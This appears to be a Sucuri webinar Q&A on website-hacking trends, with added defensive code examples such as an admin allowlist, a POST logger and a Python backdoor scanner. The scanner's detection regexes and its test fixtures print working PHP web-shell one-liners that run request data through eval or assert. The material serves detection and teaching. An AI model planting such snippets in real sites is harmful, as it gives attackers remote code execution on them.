Website Hacked Trend Report Q1/2016

June 1st, 2016 at 11am PST • Tony Perez & Daniel Cid - Sucuri Co-Founders

On May 18, 2016, we released our first Website Hacked Trend Report, providing insights on the top open-source CMS security, out-of-date software, and the specific malware families we work with every day. Sucuri Co-Founders Tony Perez and Daniel Cid dive into the details of trends for Q1 2016 including Drupal, WordPress, Joomla! and Magento.

Victoria, Canada: home of Sucuri's Ben (Remediation Lead), Alycia (Analytics & SEO) and Jen (Customer Happiness).

Tony Perez (@perezbox) & Daniel Cid (@danielcid), Sucuri Co-Founders.

Transcription

Questions & Answers

Question #1: Is it more secure to use a WordPress install on Windows IIS vs Linux?

Answer: WordPress can be used securely on both Windows and Linux. If you are more familiar with Linux and you can manage it well, use it on Linux. If Windows is your operating system of choice and you can harden it properly, use it on Windows.

Question #2: Are they saying that the out-of-date platforms are due to us (the end user) not updating the platforms? Or to those that created the plugins not providing updates?

Answer: We’re saying that the problem today exists because of poor management and administration by website owners. Website owners today seek the “easy button” in all things, including security. This is the mindset that most website owners have. This is facilitated by the idea that creating and maintaining a website is easy.

Question #3: Does having a dedicated site work best in minimizing hacking?

Answer: Not sure we understand the question here. Ideally you have a functionally isolated environment, where you’re not having a one-to-many relationship between account and websites. So no more 1 account with 50 websites installed.

Question #4: How is it that my hosting company was unable to detect my site being hacked, but I and Google were able to locate it? Even after the hosting company did a test run, they were still unable to detect it.

Answer: Hosting companies are not anti-malware companies, and they generally do not have the tools and expertise necessary to find the newest infections. Their business is hosting, and their goal is to provide a secure space for you to deploy your site. What happens inside the site is your responsibility. You have to think of hosting companies more like a cable or internet provider: they are responsible for providing you connectivity and a "space" online, nothing else.

Question #5: Is a theme site hack the same as an SEO Spamming? We used a theme and customized it but discovered years later that the theme was not updated, what does this mean?

Answer: A theme site hack can be used by an attacker to achieve multiple objectives; one of them is SEO spam. As for the lack of updates, it would fall into your responsibility as the website owner, or on whoever was responsible for maintaining the site.

Question #6: When hacking is done can it also affect your email accounts tied to that site as well?

Answer: It depends a lot on the type of compromise and where your email server is hosted. Generally a website-specific hack won't affect your email, but it is really dependent on the level of access the attackers can get and their objectives.

Question #7: Do you have the "Infected Websites" numbers related in proportion of installations?

Answer: No.

Question #8: I have nobody to care about my websites security, does Sucuri cover all security aspects so I can just install and relax?

Answer: We provide a service that covers a number of security aspects. Most everything should be addressed, but we like to encourage a relationship with our customers where it’s a balanced engagement. We’ll do a lot, but website owners have to do their part. (i.e., if you don’t properly configure, or use good passwords, there will be problems).

Question #9: What's the difference between iThemes and Sucuri, now that iThemes uses Sucuri for Malware search/removal?

Answer: iThemes is a great application security plugin to help harden your WordPress installation. Sucuri is a website security company, offering a full suite of security-related services that are platform agnostic. We protect websites via our Firewall, monitor for issues via our monitoring platform, and provide professional incident response services when everything goes to crap. iThemes does integrate our monitoring service, but if it detects an issue, they encourage website owners to come directly to us in order to enhance their security.

Question #10: I love the Sucuri team. By the way, I met Tony personally at the Joomla World Conference in Bangalore last year :)

Answer: Ah thanks, means the world to us!

Question #11: When a website is compromised, in your experience does the attacker routinely log in to install additional software, "manage it", create other users, etc., or is this an automated process done strictly through bots or other means?

Answer: A majority of the instances we see are automated. They also do install and configure new users. Automation is key for attackers.

Question #12: After you identify an infection, if you solely restrict access to the administration area through .htaccess or specific IP login allowances, how well does that tactic work to begin the identification and clean-up process and to prevent future incidents?

Answer: It honestly depends on a number of things, including whether the attacker has direct access to the web server via a backdoor. If they have backdoor access, restricting to an admin role will do little to protect you.
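One way to set up the restriction the question describes, as an added example that is not part of the webinar or of Sucuri's documentation: Apache 2.4 `Require ip` rules in the site-root .htaccess (for wp-login.php) and in wp-admin/.htaccess. The addresses are placeholders from the IETF documentation ranges; substitute your own office or VPN addresses. It assumes the host allows `AllowOverride AuthConfig` (or `All`) for the docroot. As the answer says, this only gates the login and admin URLs: a backdoor dropped under wp-content is requested directly and is not covered at all.

```apache
# --- /.htaccess (site root): wp-login.php lives here ---
# Example allowlist; 203.0.113.0/24 and 198.51.100.7 are placeholders.
<Files "wp-login.php">
    Require ip 203.0.113.0/24 198.51.100.7
</Files>

# --- /wp-admin/.htaccess: everything under wp-admin/ ---
Require ip 203.0.113.0/24 198.51.100.7

# admin-ajax.php is called by themes and plugins on behalf of anonymous
# visitors, so it stays reachable or front-end features break. With the
# default AuthMerging Off, this <Files> block replaces the rule above for
# that one file only.
<Files "admin-ajax.php">
    Require all granted
</Files>
```

On Apache 2.2 the equivalent is `Order Deny,Allow` / `Deny from all` / `Allow from <ip>`; mixing 2.2 and 2.4 syntax in one file is a common cause of 500 errors. Test from an address outside the list (a mobile connection will do) before relying on it, and keep in mind that xmlrpc.php offers a separate authenticated entry point that these rules do not touch.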

Question #13: How about a bullet list of things to do for website hardening (settings on the Sucuri website).

Answer: Great recommendation, we’ll look into this.

Question #14: For Tony and Dani: the failure to update sites in our case was due to the fact that our developer never discussed the importance of updating. Additionally, all of our experiences / nightmares related to MS Windows OS updates make one naturally hesitant to update. As for my WP site, I now update immediately.

Answer: We agree, this is a big problem. It’s like what we said on the webinar: it’s very easy to tell people “just update,” but it’s a different thing altogether to be the person who has to do the updating. When we look at the statistics, yes, a small percentage of people have issues on a platform like WordPress, but that’s not the case on other platforms. And even on WordPress, who wants to be part of that small percentage? And we’re just talking core; move into plugins and themes and things become more complicated.

Question #15: How can we find and delete a backdoor on a WP site?

Answer: Backdoors are a special type of malware that is made to be hidden and hard to find. We talk more about them here and provide tips on how to find and deal with backdoors.

Question #16: I know hosts like WP Engine list plugins they abhor (or prefer). That implies that some plugins are insecure. Does anyone publish a public list of the worst?

Answer: Not that we’re aware of. Those lists aren’t just about insecurity though, it could have resource implications within their environment as well.

Question #17: Is there a way of making all updates automatically instead of making them monthly? Greetings from Switzerland.

Answer: The update frequency is fully dependent on the developers. You could look into maintenance companies like maintainn.com or even a tool like iThemes Sync to help manage multiple web properties if on WordPress. If on Drupal, you could look at services like Drop Guard.

Question #18: Top 3 things web owners can do to prevent an attack on their WordPress site? Also: how to detect attacks when they are not blatantly obvious?

Answer:
1. Focus on access control.
2. Employ a website application firewall (this will address the “not blatant” attacks).
3. Start doing basic website administration and management.

Question #19: Do you have any stats about which popular hosting companies are hacked more than others? (i.e., GoDaddy vs BlueHost vs HostGator and other popular shared hosting servers)

Answer: No, we don't.

Question #20: Do you have any suggestions for getting web clients to take security seriously? We offer a great rate to provide website monitoring and monthly software updates. Half of my clients say 'thanks, but no thanks'. I keep going back and share stories of sites that we have had Sucuri clean up. They still don't get it.

Answer: Introducing the discussion early in the conversation, when talking about the discovery phase of a project. Unfortunately, some people won’t ever get it until they feel the pain.

Question #21: Given that so many script-based vulnerabilities are coming via HTTP POST, do you recommend trying to set up logging of HTTP POST for forensics?

Answer: Sure, that’s always a good idea if you know what you’re doing. The more information you record, the better it’ll be to perform forensics later.
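What "knowing what you're doing" looks like in practice, as an added example that is not from the webinar or from Sucuri: a small Python WSGI middleware that records every POST body as a JSON line, with the three controls a forensic analyst would insist on before enabling it. Credentials are redacted before the record exists (a wp-login.php POST carries the password in clear), bodies are capped so an upload cannot fill the disk, and the client address comes from REMOTE_ADDR rather than a spoofable header. The sample request is constructed; the `sink` callable and the field-name list for redaction are this example's own choices. For a PHP site behind Apache or nginx the same decisions apply to whatever request-logging mechanism that server provides.

```python
"""Record HTTP POST bodies for later forensics (added example, not Sucuri's code)."""
import io
import json
import re
import time
from urllib.parse import parse_qsl, urlencode

MAX_BODY = 64 * 1024   # bytes kept per request; the rest is dropped, not stored
# Form field names whose values must never reach the log (assumed list; extend as needed).
SENSITIVE = re.compile(r"(pass|pwd|secret|token|key)", re.I)


def redact_form(body):
    """Redact sensitive fields in an application/x-www-form-urlencoded body."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return urlencode([(k, "[REDACTED]" if SENSITIVE.search(k) else v) for k, v in pairs])


def make_record(environ, body_bytes):
    """Build the forensic record for one POST request."""
    ctype = environ.get("CONTENT_TYPE", "")
    truncated = len(body_bytes) > MAX_BODY
    text = body_bytes[:MAX_BODY].decode("utf-8", errors="replace")
    if ctype.startswith("application/x-www-form-urlencoded"):
        text = redact_form(text)
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
        # REMOTE_ADDR is what the socket saw; only trust X-Forwarded-For if a
        # proxy you control sets it, and then read that header instead.
        "ip": environ.get("REMOTE_ADDR", ""),
        "path": environ.get("PATH_INFO", ""),
        "ua": environ.get("HTTP_USER_AGENT", ""),
        "ctype": ctype,
        "len": len(body_bytes),
        "truncated": truncated,
        "body": text,
    }


class PostLogger:
    """WSGI middleware: hands a record of every POST to `sink` (any callable taking a dict)."""

    def __init__(self, app, sink):
        self.app, self.sink = app, sink

    def __call__(self, environ, start_response):
        if environ.get("REQUEST_METHOD") == "POST":
            length = int(environ.get("CONTENT_LENGTH") or 0)
            body = environ["wsgi.input"].read(length) if length else b""
            self.sink(make_record(environ, body))
            environ["wsgi.input"] = io.BytesIO(body)   # the app still gets to read the body
        return self.app(environ, start_response)


def demo_app(environ, start_response):
    """Stand-in application that just acknowledges the request."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"ok"]


def run_sample():
    """Constructed request: a WordPress login POST passed through the middleware."""
    records = []
    app = PostLogger(demo_app, records.append)
    body = b"log=admin&pwd=hunter2&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F"
    environ = {
        "REQUEST_METHOD": "POST", "PATH_INFO": "/wp-login.php",
        "REMOTE_ADDR": "198.51.100.23", "HTTP_USER_AGENT": "curl/7.47.0",
        "CONTENT_TYPE": "application/x-www-form-urlencoded",
        "CONTENT_LENGTH": str(len(body)), "wsgi.input": io.BytesIO(body),
    }
    list(app(environ, lambda status, headers: None))
    return records


if __name__ == "__main__":
    for rec in run_sample():
        print(json.dumps(rec))
```

In production, `sink` would append to a file outside the docroot that only root and the analyst can read; a POST log is itself sensitive data, and an attacker who can read it learns every form your users submit.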

Question #22: Hi, Tom here. We are using your services already. My question is: does your Website Monitoring cover discovering SEO Spamming? And can you detect SEO Spamming with your scanners?

Answer: Absolutely!

Question #23: how do I know if a plugin is still actually used?

Answer: Depending on what platform you’re using, if you log into your administration panel it should tell you if it’s active or inactive.

Question #24: How do you educate WordPress administrators on advanced malware attack removal before it spreads past early detection?

Answer: Very carefully.. :).. But honestly, it’s difficult. Security is a full-time job, and that's why we say it’s not a DIY project.

Question #25: How do you educate WordPress administrators on advanced malware attack removal before it spreads past early detection?

Answer: Advanced Persistent Threats (APT) is not necessarily something we see affecting most website owners. They’re often targeting large enterprises / organizations. If you’re concerned with this definitely engage our team and we’ll engage to better understand your requirements and current challenges.

Question #26: I am looking at using the Soliloquy slider. Do you have any experience with the security of this plugin?

Answer: Nope, sorry.

Question #27: I get so many spammed "comments" and "new users" that I removed comments and abilities for others to join. But I STILL get loads of comments and "joins." Can't find how the sites are being accessed.

Answer: It depends a lot on the CMS and what modules / plugins you have installed. We would need more information to help out.

Question #28: I had 7 WordPress sites with malware on Bluehost, all got blacklisted by Google. Why did they all get hit and not just some?

Answer: Once an attacker has access to an environment it only makes sense to affect as many properties as possible. This doesn’t mean it always happens this way, but in many instances it does. The attackers' automated bots look for specific files; once they find them, they inject the payload like a worm.
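The one-to-many layout that Q3 warns against and that Q28 describes the consequence of can be audited mechanically. The following is an added example, not Sucuri's tooling: a Python script that walks a hosting account's document root, finds every wp-config.php, reads the database credentials each install uses and notes which Unix user owns the file, then reports the sites that share a user or a database account. Those shared resources are exactly the paths a worm takes from one compromised install to the rest. The three-site account is constructed inside a temporary directory for the demo; point `find_installs` at the real docroot instead.

```python
"""Audit a hosting account for one-to-many WordPress layouts (added example, not Sucuri's code)."""
import os
import pwd
import re
import tempfile
from collections import defaultdict

# Matches define('DB_USER', 'value'); tolerant of spacing and quote style.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](DB_NAME|DB_USER|DB_HOST)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_wp_config(path):
    """Return the DB_* defines from a wp-config.php as a dict."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return dict(DEFINE_RE.findall(fh.read()))


def find_installs(root):
    """Return one record per WordPress install found under root, sorted by site path."""
    installs = []
    for dirpath, _dirs, files in os.walk(root):
        if "wp-config.php" in files:
            cfg_path = os.path.join(dirpath, "wp-config.php")
            st = os.stat(cfg_path)
            try:
                owner = pwd.getpwuid(st.st_uid).pw_name
            except KeyError:            # uid with no passwd entry (chroot, container)
                owner = str(st.st_uid)
            cfg = parse_wp_config(cfg_path)
            installs.append({
                "site": os.path.relpath(dirpath, root),
                "owner": owner,
                "db_user": cfg.get("DB_USER", "?"),
                "db_name": cfg.get("DB_NAME", "?"),
            })
    return sorted(installs, key=lambda i: i["site"])


def shared_resources(installs):
    """Map each Unix owner / DB user shared by two or more installs to those sites.

    Every entry returned is a one-to-many relationship of the kind the answer
    to Q3 recommends eliminating: compromise one site, and the shared account
    reaches all of them.
    """
    groups = defaultdict(list)
    for inst in installs:
        groups[("owner", inst["owner"])].append(inst["site"])
        groups[("db_user", inst["db_user"])].append(inst["site"])
    return {k: v for k, v in groups.items() if len(v) > 1}


def build_sample_account():
    """Constructed sample: three sites under one account, two of them sharing a DB user."""
    root = tempfile.mkdtemp(prefix="acct_")
    sites = {
        "blog": ("wp_blog", "acct_dbuser"),
        "shop": ("wp_shop", "acct_dbuser"),       # same DB user as blog
        "landing": ("wp_landing", "landing_only"),
    }
    for site, (db_name, db_user) in sites.items():
        os.makedirs(os.path.join(root, site))
        with open(os.path.join(root, site, "wp-config.php"), "w") as fh:
            fh.write("<?php\n"
                     f"define('DB_NAME', '{db_name}');\n"
                     f"define('DB_USER', '{db_user}');\n"
                     "define('DB_HOST', 'localhost');\n")
    return root


if __name__ == "__main__":
    root = build_sample_account()
    for key, sites in sorted(shared_resources(find_installs(root)).items()):
        print(f"{key[0]} {key[1]!r} shared by: {', '.join(sites)}")
```

On a typical shared-hosting account every install is owned by the same Unix user, so the owner group will list all of them; that is the point. The fix the answer describes is separate accounts (or at least separate system users and database users) per site, so that the output of this script becomes empty.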

Question #29: I notice that there are many attacks on my fonts in my plugins folders, what are they trying to change to compromise my site from there?

Answer: Good place to hide a backdoor.
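Q15 asked how to find a backdoor on a WordPress site; Q29 points at one of the places they hide (font directories inside plugins). The following is an added example, not from the webinar and not Sucuri's scanner: a Python triage script that applies two checks across a WordPress tree. First, any PHP file under a directory that should only hold static assets (uploads, fonts, css, images) is suspicious whatever it contains. Second, PHP source showing the usual backdoor fingerprints: a decoder chain in front of eval, code execution fed straight from request data, preg_replace with the /e modifier, or a very long base64 blob. The directory list and the regexes are this example's own heuristics, tuned for a short list to review by hand, not a verdict. The sample tree, with one clean plugin file and two planted backdoors, is constructed for the demo.

```python
"""Heuristic hunt for PHP backdoors in a WordPress tree (added example, not Sucuri's code)."""
import os
import re
import tempfile

# Directories that should never contain server-side code (assumed list; extend per site).
STATIC_ONLY_DIRS = {"uploads", "fonts", "font", "css", "images", "img", "cache"}

# (label, regex) pairs; a file is reported if any of them matches its source.
FINGERPRINTS = [
    ("eval-of-decoded-payload",
     re.compile(r"eval\s*\(\s*(?:@?\s*)?(?:base64_decode|gzinflate|gzuncompress|str_rot13|gzdecode)\s*\(", re.I)),
    ("exec-from-request",
     re.compile(r"\b(?:eval|assert|system|exec|passthru|shell_exec|popen|proc_open)\s*\(\s*(?:@?\s*)?\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace-e-modifier",
     re.compile(r"preg_replace\s*\(\s*['\"].*?/[imsxuADSUXJ]*e[imsxuADSUXJ]*['\"]", re.I)),
    ("create_function",
     re.compile(r"\bcreate_function\s*\(", re.I)),
    ("long-base64-blob",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]


def score_php(source):
    """Return the fingerprint labels that match a PHP source string."""
    return [label for label, rx in FINGERPRINTS if rx.search(source)]


def in_static_dir(rel_path):
    """True if any directory component of rel_path is a static-asset directory."""
    parts = rel_path.replace(os.sep, "/").split("/")[:-1]
    return any(p.lower() in STATIC_ONLY_DIRS for p in parts)


def scan_tree(root):
    """Walk root and return {relative_path: [reasons]} for every suspicious PHP file."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5", ".inc")):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = []
            if in_static_dir(rel):
                reasons.append("php-in-static-directory")
            with open(full, encoding="utf-8", errors="replace") as fh:
                reasons.extend(score_php(fh.read()))
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_tree():
    """Constructed WordPress fragment: one clean plugin file and two planted backdoors."""
    root = tempfile.mkdtemp(prefix="wp_")
    samples = {
        # ordinary plugin code: no finding expected
        "wp-content/plugins/demo/demo.php":
            "<?php\nadd_action('init', function () { wp_enqueue_style('demo'); });\n",
        # PHP hidden among font assets, the pattern asked about in Q29
        "wp-content/plugins/demo/fonts/glyphs.php":
            "<?php @eval(base64_decode($_POST['k']));\n",
        # dropper in the uploads tree, taking its command from the request
        "wp-content/uploads/2016/03/image.php":
            "<?php if(isset($_REQUEST['c'])){ @assert($_REQUEST['c']); }\n",
    }
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reasons in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(reasons)}")
```

Treat a hit as a lead, not a conviction: compare the file against a clean copy of the same plugin or theme version, check its modification time against its neighbours, and look in the access log for requests to that path. Finding one backdoor does not mean there is only one, which is why a clean reinstall from known-good sources, with rotated credentials, is the usual end state rather than deleting the files one by one.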

Question #30: I see a lot of .htaccess redirects. Is this because the CMS needs to be hardened or should the host be hardened?

Answer: Well if the attacker is compromising your website and injecting malicious redirects on your .htaccess then I’d say you definitely have a few security issues going on.

Question #31: If a site continues to get 404 errors reported in Google Search Console is that a sign of a website infection or just an attempt at SpamSEO? How do you stop the continual spam 404 errors?

Answer: We wrote a great article on this here

Question #32: In the case of something like TimThumb, that's buried inside of OTHER plugins, so people don't see it on their list of plugins, and they have no idea. Especially if it's an old plugin that isn't being maintained anymore, so you don't ever see an update for that dangerous plugin. How many of us might never notice that some plugin we installed 4 years ago hasn't been updated in 2 or 3 years? I'm a conscientious manager, but I struggle with this one: "Wait, it's been HOW LONG?" And that doesn't even go into the issue of having to research updates to see if they're likely to break my site. Maintaining plugins is the biggest problem I have.

Answer: Yes, agree, this is a tough one. Same applies to plugins that are embedded into themes and frameworks (i.e., RevSlider).

Question #33: Most clients don't want to pay for management, what to do?

Answer: Yeah, this is a tough one. Sometimes with some education and communication they will understand the needs; other times they only learn once they feel the pain of a compromise.

Question #34: My client's site got hacked by Rokui'SH. It was a Joomla platform; we are going to move to WP Engine hosting. They got her database, so we shut it down. Can you work with WP Engine?

Answer: If it’s a Joomla! CMS you won’t be able to move to WP Engine, they are focused specifically on WordPress. But yes, we can work with them.

Question #35: Regarding test sites, my organization uses the GoDaddy Managed WordPress platform, which offers 1-click staging. I've been told these staging sites aren't a vulnerability for us despite the fact that the plugins/themes are not kept up-to-date (though the core is). These staging sites are discouraged from search engines but they aren't password-protected. Do you get the sense that these sites could be problematic, and if so, how do you suggest I address this with GoDaddy?

Answer: It depends, don’t know exactly how they’re configured. If those staging sites are on the same account or server they could be a problem. Without knowing more on how they do it, it’s hard to say.

Question #36: So much info about .htaccess, robots.txt and wp-config.php and what should or shouldn't be included. Can Sucuri provide a basic starting point for securing through these methods, for the different platforms?

Answer: We stopped doing this because it’s completely unmanageable. It’s why we have the Sucuri Firewall now, the threat landscape changes daily. To try to maintain a list like that would be too much for even the most motivated website administrator.

Question #37: This has probably been asked a number of times, but I have had nothing but issues with audio and video on this webinar will the recording be made available to participants?

Answer: Yes, it will, and sorry about that. We’re looking into ways to improve this in the future.

Question #38: This is the first webinar that has been held on a day I could attend. Is it possible to get recordings of previous webinars? I would really like to view more!

Answer: Yes you can view all of our webinars here

Question #39: What hosting companies do you recommend?

Answer: It honestly depends on what you’re looking to do. There are some great unmanaged platforms where you can deploy your servers, like Linode, AWS, Google and Digital Ocean. You can also use providers that do some of the work for you, including SiteGround, WPEngine and many others, depending on your needs and budget.

Question #40: What is your recommendation for keeping track of Joomla plugins/components which do not use the Joomla update system? Is there a website which collects this information on Joomla plugins?

Answer: If you are using any premium/paid extension, I recommend checking with the developer whether they have a security mailing list and tracking that. The Joomla! Vulnerable Extensions List is a great resource as well.

Question #41: You spoke about hardening WP when installing. It's a manual process. Do you ever foresee the WP development team writing a script to do that automatically upon installation?

Answer: The web is moving to a secure by default mindset, so some of the work is being done by default and will get better over the years. However, a lot of the hardening is also specific to your hosting and usage, and that will have to be done manually.